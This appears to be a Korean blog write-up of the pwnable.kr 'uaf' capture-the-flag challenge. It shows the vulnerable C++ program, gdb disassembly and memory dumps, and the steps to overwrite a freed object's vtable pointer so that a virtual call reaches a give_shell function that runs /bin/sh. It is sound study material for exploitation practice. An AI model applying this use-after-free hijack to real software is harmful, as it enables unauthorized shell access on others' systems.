[Pwnable.kr] uaf 풀이 (8pt)
풀이
Use After Free 취약점을 아는지 물어보는 문제이다. (나는 뭔지 몰라서 찾아봤다.)
다음은 uaf.cpp의 코드이다.
#include <fcntl.h>
#include <iostream>
#include <cstring>
#include <cstdlib>
#include <unistd.h>
using namespace std;
class Human{
private:
virtual void give_shell(){
system("/bin/sh");
}
protected:
int age;
string name;
public:
virtual void introduce(){
cout << "My name is " << name << endl;
cout << "I am " << age << " years old" << endl;
}
};
class Man: public Human{
public:
Man(string name, int age){
this->name = name;
this->age = age;
}
virtual void introduce(){
Human::introduce();
cout << "I am a nice guy!" << endl;
}
};
class Woman: public Human{
public:
Woman(string name, int age){
this->name = name;
this->age = age;
}
virtual void introduce(){
Human::introduce();
cout << "I am a cute girl!" << endl;
}
};
int main(int argc, char* argv[]){
Human* m = new Man("Jack", 25);
Human* w = new Woman("Jill", 21);
size_t len;
char* data;
unsigned int op;
while(1){
cout << "1. use\n2. after\n3. free\n";
cin >> op;
switch(op){
case 1:
m->introduce();
w->introduce();
break;
case 2:
len = atoi(argv[1]);
data = new char[len];
read(open(argv[2], O_RDONLY), data, len);
cout << "your data is allocated" << endl;
break;
case 3:
delete m;
delete w;
break;
default:
break;
}
}
return 0;
}오랜만에 보는 C++ 코드다.
모든 함수에 대해 알 필요는 없고, 풀이에 필요한 코드는 다음 부분이다.
case 1:
m->introduce();
w->introduce();
break;
case 2:
len = atoi(argv[1]);
data = new char[len];
read(open(argv[2], O_RDONLY), data, len);
cout << "your data is allocated" << endl;
break;
case 3:
delete m;
delete w;
break;입력 값이 1이면, Class에 introduce 함수를 실행한다.
입력 값이 2이면, argv[1]만큼 data를 할당하고 argv[2] 경로에 있는 값을 읽어 data에 저장한다.
입력 값이 3이면 m, w 객체를 삭제한다. (free)
먼저 /tmp 밑 경로에 아무 텍스트나 입력하고, uaf에 넣어보자. 나는 AAAA를 넣고 돌려봤다.
uaf@pwnable:~$ python -c 'print "AAAA"' | cat > /tmp/bjloed_uaf/AAAA먼저 switch문에 해당하는 어셈을 찾아보도록 하자.
참고로, set print asm-demangle on을 해주면, gdb C++ 출력 스타일을 바꿀 수 있다.
0x0000000000400fb2 <+238>: mov eax,DWORD PTR [rbp-0x18]
0x0000000000400fb5 <+241>: cmp eax,0x2
0x0000000000400fb8 <+244>: je 0x401000 <main+316>
0x0000000000400fba <+246>: cmp eax,0x3
0x0000000000400fbd <+249>: je 0x401076 <main+434>
0x0000000000400fc3 <+255>: cmp eax,0x1
0x0000000000400fc6 <+258>: je 0x400fcd <main+265>eax에 해당하는 값(1,2,3)에 따라 분기점이 나뉘는 걸 봐서는, 해당 부분이 switch문 인듯하다.
3번은 볼 필요가 없을 듯하니, 1번부터 봐보자. main+265번째에 해당하는 곳으로 이동하자.
0x0000000000400fcd <+265>: mov rax,QWORD PTR [rbp-0x38]
0x0000000000400fd1 <+269>: mov rax,QWORD PTR [rax]
0x0000000000400fd4 <+272>: add rax,0x8
0x0000000000400fd8 <+276>: mov rdx,QWORD PTR [rax]
0x0000000000400fdb <+279>: mov rax,QWORD PTR [rbp-0x38]
0x0000000000400fdf <+283>: mov rdi,rax
0x0000000000400fe2 <+286>: call rdx
0x0000000000400fe4 <+288>: mov rax,QWORD PTR [rbp-0x30]
0x0000000000400fe8 <+292>: mov rax,QWORD PTR [rax]
0x0000000000400feb <+295>: add rax,0x8
0x0000000000400fef <+299>: mov rdx,QWORD PTR [rax]
0x0000000000400ff2 <+302>: mov rax,QWORD PTR [rbp-0x30]
0x0000000000400ff6 <+306>: mov rdi,rax
0x0000000000400ff9 <+309>: call rdx
0x0000000000400ffb <+311>: jmp 0x4010a9 <main+485>먼저 main+269에 bp를 걸고, rax의 값을 봐보자.
Breakpoint 1, 0x0000000000400fd1 in main ()
(gdb) i r rax
rax 0x11b9c50 185867040x11b9c50이라는 값이 들어가있다. 해당 주소는 무슨 값을 가리키고 있는지 확인해보자.
(gdb) x/16x 0x11b9c50
0x11b9c50: 0x00401570 0x00000000 0x00000019 0x000000000x401570이라는 값이 들어가있다. 또 무슨 값을 가리키고 있는지 확인해보자.
(gdb) x/16x 0x401570
0x401570 <vtable for Man+16>: 0x0040117a 0x00000000 0x004012d2 0x000000000x40117a라는 값을 확인해보니, 우리가 찾던 give_shell 함수의 주소임을 알 수 있었다.
(gdb) x/16x 0x40117a
0x40117a <Human::give_shell()>: 0xe5894855 0x10ec8348 0xf87d8948 0x4014a8bf이제 give_shell 함수의 주소를 알았으니, 우리가 입력한 값이 어디로 저장되는지 알아야한다.
아마도, rbp-0x38가 가리키고 있는 주소에 있을 듯하나, 혹시 모르니 확인해보자.
값을 free하고 재할당 해준 후, 확인해보자.
(참고로 2를 1번만 선택했을 경우에는, 왜인지 모르겠지만 빈 값이 들어가있다. 2번 해줘야 정상적으로 들어간다.)
0x0000000000400fd4 in main ()
(gdb) i r
rax 0x41414141 1094795585해당 부분에 bp를 걸고 확인해보니, 역시 맞았다.
코드를 보아하니, m->introduce()를 실행시키기 전, rax에 0x8 값을 더해준다.
그렇다면 입력 부분에 give_shell 함수에서 0x8만큼 빼준 주소를 넣어주면 m->introduce()가 give_shell을 가리킬 것이다.
참고로 /tmp/bjloed_uaf/AAAA에는 AAAA가 아닌 give_shell 함수 주소에서 0x8만큼 뺀 주소가 적혀있다.
